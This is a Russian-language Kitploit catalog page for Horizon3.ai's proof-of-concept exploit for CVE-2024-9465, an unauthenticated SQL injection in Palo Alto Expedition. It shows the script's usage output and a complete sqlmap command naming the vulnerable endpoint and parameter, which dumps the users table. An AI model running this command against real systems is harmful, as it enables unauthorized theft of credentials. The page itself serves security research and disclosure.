Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-9465 — Эксплойт Proof of Concept для CVE-2024-9465 | Kitploit
Инструменты/GitHubGitHub/horizon3ai/cve-2024-9465
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubhorizon3ai/cve-2024-9465

CVE-2024-9465

Эксплойт Proof of Concept для CVE-2024-9465

Репозиторий
3141 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-9465: Неаутентифицированная SQL-инъекция в Palo Alto Expedition

Доказательство концепции для эксплуатации CVE-2024-9465 на уязвимых устройствах.

Сообщение в блоге

Основная причина и индикаторы компрометации здесь: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/

Использование

root@kitploit:~
% python3 CVE-2024-9465.py -h
usage: CVE-2024-9465.py [-h] -u URL

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  The URL of the target

Дамп таблицы с помощью SQLMap

root@kitploit:~
python3 sqlmap.py -u "https://<ip_address>/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump

Следите за Horizon3.ai Attack Team в Twitter, чтобы узнавать о последних исследованиях в области безопасности:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Отказ от ответственности

Данное программное обеспечение создано исключительно для целей академических исследований и разработки эффективных защитных методик и не предназначено для атаки на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.

Скачать инструмент